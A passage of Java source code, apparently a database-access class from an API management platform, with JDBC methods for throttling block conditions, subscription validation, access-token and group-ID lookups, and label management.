@param uuid UUID of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionStateByUUID(String uuid, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setString(2, uuid); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition UUID " + uuid, ex); } } handleException("Failed to update Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param conditionId id of the condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setInt(1, conditionId); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition id " + conditionId, ex); } } handleException("Failed to delete Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param uuid UUID of the block condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setString(1, uuid); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition UUID " + uuid, ex); } } handleException("Failed to delete Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } private boolean isValidContext(String context) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "select count(*) COUNT from AM_API where CONTEXT=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, context); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next() && resultSet.getInt("COUNT") > 0) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback checking Block condition with context " + context, ex); } } handleException("Failed to check Block condition with context " + context, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } private boolean isValidApplication(String appOwner, String appName) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "SELECT * FROM AM_APPLICATION App,AM_SUBSCRIBER SUB WHERE App.NAME=? AND App" + ".SUBSCRIBER_ID=SUB.SUBSCRIBER_ID AND SUB.USER_ID=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, appName); validateContextPreparedStatement.setString(2, appOwner); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next()) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback checking Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, ex); } } handleException("Failed to check Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } public String getAPILevelTier(int id) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; String apiLevelTier = null; try { String query = SQLConstants.GET_API_DETAILS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query + " WHERE API_ID = ?"); selectPreparedStatement.setInt(1, id); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { apiLevelTier = resultSet.getString("API_TIER"); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting API Details", ex); } } handleException("Failed to get API Details", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return apiLevelTier; } private boolean isBlockConditionExist(String conditionType, String conditionValue, String tenantDomain, Connection connection) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; ResultSet checkIsResultSet = null; boolean status = false; try { String isExistQuery = SQLConstants.ThrottleSQLConstants.BLOCK_CONDITION_EXIST_SQL; checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tenantDomain); checkIsExistPreparedStatement.setString(2, conditionType); checkIsExistPreparedStatement.setString(3, conditionValue); checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); connection.commit(); if (checkIsResultSet.next()) { status = true; } } catch (SQLException e) { String msg = "Couldn't check the Block Condition Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, null, checkIsResultSet); } return status; } public boolean hasSubscription(String tierId, String tenantDomainWithAt, String policyLevel) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; Connection connection = null; ResultSet checkIsResultSet = null; boolean status = false; try { /*String apiProvider = tenantId;*/ connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); String isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_RESOURCES_API; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_APPLICATION; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; } checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tierId); checkIsExistPreparedStatement.setString(2, "%" + tenantDomainWithAt); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { checkIsExistPreparedStatement.setString(3, tierId); checkIsExistPreparedStatement.setString(4, "%" + tenantDomainWithAt); } checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); if (checkIsResultSet != null && checkIsResultSet.next()) { int count = checkIsResultSet.getInt(1); if (count > 0) { status = true; } } connection.setAutoCommit(true); } catch (SQLException e) { String msg = "Couldn't check Subscription Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, connection, checkIsResultSet); } return status; } /** * Get a list of access tokens issued for given user under the given app of given owner. Returned object carries * consumer key and secret information related to the access token * * @param userName end user name * @param appName application name * @param appOwner application owner user name * @return list of tokens * @throws SQLException in case of a DB issue */ public static List<AccessTokenInfo> getAccessTokenListForUser(String userName, String appName, String appOwner) throws SQLException { List<AccessTokenInfo> accessTokens = new ArrayList<AccessTokenInfo>(5); Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement consumerSecretIDPS = connection.prepareStatement(SQLConstants.GET_ACCESS_TOKENS_BY_USER_SQL); consumerSecretIDPS.setString(1, userName); consumerSecretIDPS.setString(2, appName); consumerSecretIDPS.setString(3, appOwner); ResultSet consumerSecretIDResult = consumerSecretIDPS.executeQuery(); while (consumerSecretIDResult.next()) { String consumerKey = consumerSecretIDResult.getString(1); String consumerSecret = consumerSecretIDResult.getString(2); String accessToken = consumerSecretIDResult.getString(3); AccessTokenInfo accessTokenInfo = new AccessTokenInfo(); accessTokenInfo.setConsumerKey(consumerKey); accessTokenInfo.setConsumerSecret(consumerSecret); accessTokenInfo.setAccessToken(accessToken); accessTokens.add(accessTokenInfo); } return accessTokens; } public String[] getAPIDetailsByContext(String context) { String apiName = ""; String apiProvider = ""; String sql = SQLConstants.GET_API_FOR_CONTEXT_TEMPLATE_SQL; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); rs = ps.executeQuery(); if (rs.next()) { apiName = rs.getString("API_NAME"); apiProvider = rs.getString("API_PROVIDER"); } } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return new String[]{apiName, apiProvider}; } /** * Check for the subscription of the user * * @param infoDTO * @param context * @param version * @param consumerKey * @return APIKeyValidationInfoDTO including data of api and application * @throws APIManagementException */ public APIKeyValidationInfoDTO validateSubscriptionDetails(APIKeyValidationInfoDTO infoDTO, String context, String version, String consumerKey, boolean defaultVersionInvoked) throws APIManagementException { String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED .equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return infoDTO; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return infoDTO; } final String API_PROVIDER = rs.getString("API_PROVIDER"); final String SUB_TIER = rs.getString("TIER_ID"); final String APP_TIER = rs.getString("APPLICATION_TIER"); infoDTO.setTier(SUB_TIER); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(API_PROVIDER); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(APP_TIER); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(API_PROVIDER); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, APP_TIER, SUB_TIER, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } infoDTO.setAuthorized(true); return infoDTO; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return infoDTO; } /** * Returns a Prepared statement after setting all the dynamic parameters. Dynamic parameters will be added in * the place of $params in query string * * @param conn connection which will be used to create a prepared statement * @param query dynamic query string which will be modified. * @param params list of parameters * @param startingParamIndex index from which the parameter numbering will start. * @return * @throws SQLException */ public PreparedStatement fillQueryParams(Connection conn, String query, String params[], int startingParamIndex) throws SQLException { String paramString = ""; for (int i = 1; i <= params.length; i++) { if (i == params.length) { paramString = paramString + "?"; } else { paramString = paramString + "?,"; } } query = query.replace("$params", paramString); if (log.isDebugEnabled()) { log.info("Prepared statement query :" + query); } PreparedStatement preparedStatement = conn.prepareStatement(query); for (int i = 0; i < params.length; i++) { preparedStatement.setString(startingParamIndex, params[i]); startingParamIndex++; } return preparedStatement; } /** * Returns True if AM_APPLICATION_GROUP_MAPPING table exist in AM DB * * @return */ public boolean isGrpIdMappingTableExist() { String sql = "SELECT * FROM AM_APPLICATION_GROUP_MAPPING"; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sql); rs = ps.executeQuery(); } catch (SQLException e) { log.info("AM_APPLICATION_GROUP_MAPPING :- " + e.getMessage(), e); return false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return true; } /** * Adds a new record in AM_APPLICATION_GROUP_MAPPING for each group * * @param conn * @param applicationId * @param groupIdString group id values separated by commas * @return * @throws APIManagementException */ private boolean updateGroupIDMappings(Connection conn, int applicationId, String groupIdString, String tenant) throws APIManagementException { boolean updateSuccessful = false; PreparedStatement removeMigratedGroupIdsStatement = null; PreparedStatement deleteStatement = null; PreparedStatement insertStatement = null; String deleteQuery = SQLConstants.REMOVE_GROUP_ID_MAPPING_SQL; String insertQuery = SQLConstants.ADD_GROUP_ID_MAPPING_SQL; try { // Remove migrated Group ID information so that it can be replaced by updated Group ID's that are now // being saved. This is done to ensure that there is no conflicting migrated Group ID data remaining removeMigratedGroupIdsStatement = conn.prepareStatement(SQLConstants.REMOVE_MIGRATED_GROUP_ID_SQL); removeMigratedGroupIdsStatement.setInt(1, applicationId); removeMigratedGroupIdsStatement.executeUpdate(); deleteStatement = conn.prepareStatement(deleteQuery); deleteStatement.setInt(1, applicationId); deleteStatement.executeUpdate(); if (!StringUtils.isEmpty(groupIdString)) { String[] groupIdArray = groupIdString.split(","); insertStatement = conn.prepareStatement(insertQuery); for (String group : groupIdArray) { insertStatement.setInt(1, applicationId); insertStatement.setString(2, group); insertStatement.setString(3, tenant); insertStatement.addBatch(); } insertStatement.executeBatch(); } updateSuccessful = true; } catch (SQLException e) { updateSuccessful = false; handleException("Failed to update GroupId mappings ", e); } finally { APIMgtDBUtil.closeAllConnections(removeMigratedGroupIdsStatement, null, null); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); APIMgtDBUtil.closeAllConnections(insertStatement, null, null); } return updateSuccessful; } /** * Fetches all the groups for a given application and creates a single string separated by comma * * @param applicationId * @return comma separated group Id String * @throws APIManagementException */ public String getGroupId(int applicationId) throws APIManagementException { String grpId = ""; ArrayList<String> grpIdList = new ArrayList<String>(); PreparedStatement preparedStatement = null; Connection conn = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_GROUP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { grpIdList.add(resultSet.getString("GROUP_ID")); } for (int i = 0; i < grpIdList.size(); i++) { if (i == grpIdList.size() - 1) { grpId = grpId + grpIdList.get(i); } else { grpId = grpId + grpIdList.get(i) + ","; } } } catch (SQLException e) { handleException("Failed to Retrieve GroupId for application " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, resultSet); } return grpId; } /** * Get access token information associated with the given consumer key. * * @param consumerKey The consumer key. * @return APIKey The access token information. * @throws SQLException * @throws CryptoException */ public APIKey getAccessTokenInfoByConsumerKey(String consumerKey) throws SQLException, CryptoException, APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; String username = getUserIdFromConsumerKey(consumerKey); accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; String statement = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_SUFFIX; String oracleSQL = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_SUFFIX; String mySQL = "SELECT" + statement; String db2SQL = "SELECT" + statement; String msSQL = "SELECT " + statement; String postgreSQL = "SELECT * FROM (SELECT" + statement + ") AS TOKEN"; String accessToken; String sql; try { connection = APIMgtDBUtil.getConnection(); if (connection.getMetaData().getDriverName().contains("MySQL") || connection.getMetaData().getDriverName ().contains("H2")) { sql = mySQL; } else if (connection.getMetaData().getDatabaseProductName().contains("DB2")) { sql = db2SQL; } else if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData() .getDriverName().contains("Microsoft")) { sql = msSQL; } else if (connection.getMetaData().getDriverName().contains("PostgreSQL")) { sql = postgreSQL; } else { sql = oracleSQL; } preparedStatement = connection.prepareStatement(sql); preparedStatement.setString(1, consumerKey); preparedStatement.setString(2, APIConstants.ACCESS_TOKEN_USER_TYPE_APPLICATION); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { APIKey apiKey = new APIKey(); accessToken = APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN")); apiKey.setConsumerKey(consumerKey); String consumerSecret = resultSet.getString("CONSUMER_SECRET"); apiKey.setConsumerSecret(APIUtil.decryptToken(consumerSecret)); apiKey.setAccessToken(accessToken); apiKey.setValidityPeriod(resultSet.getLong("VALIDITY_PERIOD") / 1000); apiKey.setGrantTypes(resultSet.getString("GRANT_TYPES")); apiKey.setCallbackUrl(resultSet.getString("CALLBACK_URL")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = resultSet.getString("ACCESS_TOKEN"); do { String currentRowTokenString = resultSet.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(resultSet.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } } while (resultSet.next()); apiKey.setTokenScope(getScopeString(scopes)); return apiKey; } return null; } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } } /** * Returns the user id for the consumer key. * * @param consumerKey The consumer key. * @return String The user id. */ private String getUserIdFromConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String userId = null; String sqlQuery = SQLConstants.GET_USER_ID_FROM_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { userId = rs.getString("USER_ID"); } } catch (SQLException e) { handleException("Error when getting the user id for Consumer Key" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return userId; } /** * Get Subscribed APIs for an App. * * @param applicationName id of the application name * @return APISubscriptionInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APISubscriptionInfoDTO[] getSubscribedAPIsForAnApp(String userId, String applicationName) throws APIManagementException { List<APISubscriptionInfoDTO> apiSubscriptionInfoDTOS = new ArrayList<APISubscriptionInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); rs = ps.executeQuery(); while (rs.next()) { APISubscriptionInfoDTO infoDTO = new APISubscriptionInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setContext(rs.getString("API_CONTEXT")); infoDTO.setVersion(rs.getString("API_VERSION")); infoDTO.setSubscriptionTier(rs.getString("SP_TIER_ID")); apiSubscriptionInfoDTOS.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiSubscriptionInfoDTOS.toArray(new APISubscriptionInfoDTO[apiSubscriptionInfoDTOS.size()]); } public Application getApplicationByClientId(String clientId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_CLIENT_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, clientId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationId = rs.getString("APPLICATION_ID"); String applicationName = rs.getString("NAME"); String applicationOwner = rs.getString("CREATED_BY"); application = new Application(applicationId); application.setName(applicationName); application.setOwner(applicationOwner); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); application.setKeyType(rs.getString("KEY_TYPE")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } } } catch (SQLException e) { handleException("Error while obtaining details of the Application foe client id " + clientId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Returns the Label List for the TenantId. * * @param tenantDomain The tenant domain. * @return List of labels. */ public List<Label> getAllLabels(String tenantDomain) throws APIManagementException { List<Label> labelList = new ArrayList<>(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_LABEL_BY_TENANT)) { try { connection.setAutoCommit(false); statement.setString(1, tenantDomain); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String labelId = rs.getString("LABEL_ID"); String labelName = rs.getString("NAME"); String description = rs.getString("DESCRIPTION"); Label label = new Label(); label.setLabelId(labelId); label.setName(labelName); label.setDescription(description); label.setAccessUrls(getAccessUrlList(connection, labelId)); labelList.add(label); } } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to get Labels of " + tenantDomain, e); } finally { connection.setAutoCommit(true); } } catch (SQLException e) { handleException("Failed to get Labels of " + tenantDomain, e); } return labelList; } /** * Returns the URL list for label id. * * @param labelId label id. * @return List of string. */ private List<String> getAccessUrlList(Connection connection, String labelId) throws APIManagementException { List<String> hostList = new ArrayList<>(); try (PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_URL_BY_LABEL_ID)) { statement.setString(1, labelId); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String host = rs.getString("ACCESS_URL"); hostList.add(host); } } } catch (SQLException e) { handleException("Failed to get label list: " , e); } return hostList; } /** * Returns the Label. * * @param tenantDomain The tenant domain. * @param label label object. * @return label. */ public Label addLabel(String tenantDomain, Label label) throws APIManagementException { String uuid = UUID.randomUUID().toString(); label.setLabelId(uuid); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, uuid); statement.setString(2, label.getName()); statement.setString(3, label.getDescription()); statement.setString(4, tenantDomain); statement.executeUpdate(); if (!label.getAccessUrls().isEmpty()) { insertAccessUrlMappings(connection, uuid, label.getAccessUrls()); } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to add label: " + uuid, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to add label: " + uuid, e); } return label; } /** * Insert URL to the URL table * * @param uuid label id. * @param urlList The list of url. * @throws APIManagementException */ private void insertAccessUrlMappings(Connection connection, String uuid, List<String> urlList) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_URL_MAPPING_SQL)) { for (String accessUrl : urlList) { statement.setString(1, uuid); statement.setString(2, accessUrl); statement.addBatch(); } statement.executeBatch(); } catch (SQLException e) { handleException("Failed to add label url : " + uuid, e); } } /** * Delete label. * * @param labelUUID label id. * @throws APIManagementException */ public void deleteLabel(String labelUUID) throws APIManagementException { try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, labelUUID); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to delete label : " + labelUUID, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to delete label : " + labelUUID, e); } } /** * Delete label URL * * @param labelUUID label id. * @throws APIManagementException */ private void deleteAccessUrlMappings(Connection connection, String labelUUID) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_URL_MAPPING_SQL)) { statement.setString(1, labelUUID); statement.executeUpdate(); } catch (SQLException e) { handleException("Failed to delete label url : ", e); } } /** * Update the label. * * @param label label object. * @return labels. */ public Label updateLabel(Label label) throws APIManagementException { List<String> accessURLs = label.getAccessUrls(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.UPDATE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, label.getName()); statement.setString(2, label.getDescription()); statement.setString(3, label.getLabelId()); deleteAccessUrlMappings(connection, label.getLabelId()); insertAccessUrlMappings(connection, label.getLabelId(), accessURLs); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to update label : ", e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to update label : ", e); } return label; } private void addApplicationAttributes(Connection conn, Map<String, String> attributes, int applicationId, int tenantId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; try { if(attributes != null) { ps = conn.prepareStatement(SQLConstants.ADD_APPLICATION_ATTRIBUTES_SQL); for (String key : attributes.keySet()) { ps.setInt(1, applicationId); ps.setString(2, key); ps.setString(3, attributes.get(key)); ps.setInt(4, tenantId); ps.addBatch(); } 